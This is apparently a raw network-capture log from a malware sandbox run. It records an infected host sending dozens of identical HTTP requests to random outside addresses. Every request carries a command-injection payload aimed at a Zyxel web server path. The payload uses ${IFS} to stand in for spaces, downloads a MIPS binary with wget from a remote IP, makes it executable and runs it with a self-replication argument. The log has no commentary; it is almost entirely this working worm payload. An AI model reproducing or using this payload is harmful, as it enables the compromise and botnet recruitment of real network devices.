                                      Jan 14, 2024 15:50:06.774204016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      131192.168.2.1454574217.222.255.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774231911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      132192.168.2.1442030201.69.134.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774327993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      133192.168.2.1456602140.41.179.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774349928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      134192.168.2.146021062.158.255.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774415016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      135192.168.2.145466890.122.104.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774471998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      136192.168.2.145889213.107.135.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774516106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      137192.168.2.1432912151.44.51.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774544954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      138192.168.2.145369460.163.230.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774604082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      139192.168.2.144406873.146.190.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774638891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      140192.168.2.144107257.109.25.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774705887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      141192.168.2.144409451.202.140.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774724960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      142192.168.2.1439848190.103.93.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774791956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      143192.168.2.145196052.53.198.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.775532961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      144192.168.2.1446698148.52.242.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.775573015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      145192.168.2.1453214183.230.0.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.775623083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      146192.168.2.1444724103.125.147.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.775861025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      147192.168.2.144851679.155.217.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.775893927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      148192.168.2.1444504149.253.222.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776048899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      149192.168.2.1448604216.56.47.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776076078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      150192.168.2.1439432110.165.54.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776249886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      151192.168.2.1436542159.51.46.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776268005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      152192.168.2.143964085.34.8.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776422977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      153192.168.2.14467321.150.82.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776463985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      154192.168.2.144510064.253.180.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776648045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      155192.168.2.146056650.72.210.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776689053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      156192.168.2.143586464.45.188.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776850939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      157192.168.2.1454258104.164.140.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.776899099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      158192.168.2.145516897.222.102.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777059078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      159192.168.2.144164887.244.45.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777103901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      160192.168.2.1448324124.212.115.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777240038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      161192.168.2.1433318218.122.68.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777290106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      162192.168.2.1444270169.116.207.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777489901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      163192.168.2.1440522176.190.154.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777514935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      164192.168.2.1438542180.238.6.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777559042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      165192.168.2.1436272188.119.142.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777724981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      166192.168.2.1448380195.211.219.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777755022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      167192.168.2.143654681.160.66.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777930975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      168192.168.2.144913613.199.197.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.777967930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      169192.168.2.143338870.199.69.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778131962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      170192.168.2.14410002.190.28.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778160095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      171192.168.2.1436078130.158.33.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778203964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      172192.168.2.1436034146.46.0.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778397083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      173192.168.2.1449142145.23.31.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778451920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      174192.168.2.145481898.74.76.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778579950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      175192.168.2.1435704178.72.184.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778625965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      176192.168.2.143377232.20.203.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778819084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      177192.168.2.1446652187.117.206.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.778985977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      178192.168.2.144262258.63.156.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.779015064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      179192.168.2.1442486155.175.128.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.779227018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      180192.168.2.145951888.100.19.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.779253006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      181192.168.2.1444318201.46.35.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.779426098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      182192.168.2.144753058.61.125.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.779484034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      183192.168.2.1448146186.147.31.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.779982090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      184192.168.2.1446168142.87.3.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780011892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      185192.168.2.1441552114.84.29.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780287027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      186192.168.2.144800050.210.214.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780338049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      187192.168.2.1454754207.210.213.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780400038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      188192.168.2.1449734146.157.11.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780411005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      189192.168.2.1454310183.79.235.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780411959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      190192.168.2.144111234.110.61.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780478001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      191192.168.2.143785085.175.203.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780541897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      192192.168.2.1442386176.167.239.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780555010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      193192.168.2.145345054.177.124.42443
                                      TimestampBytes transferredDirectionData
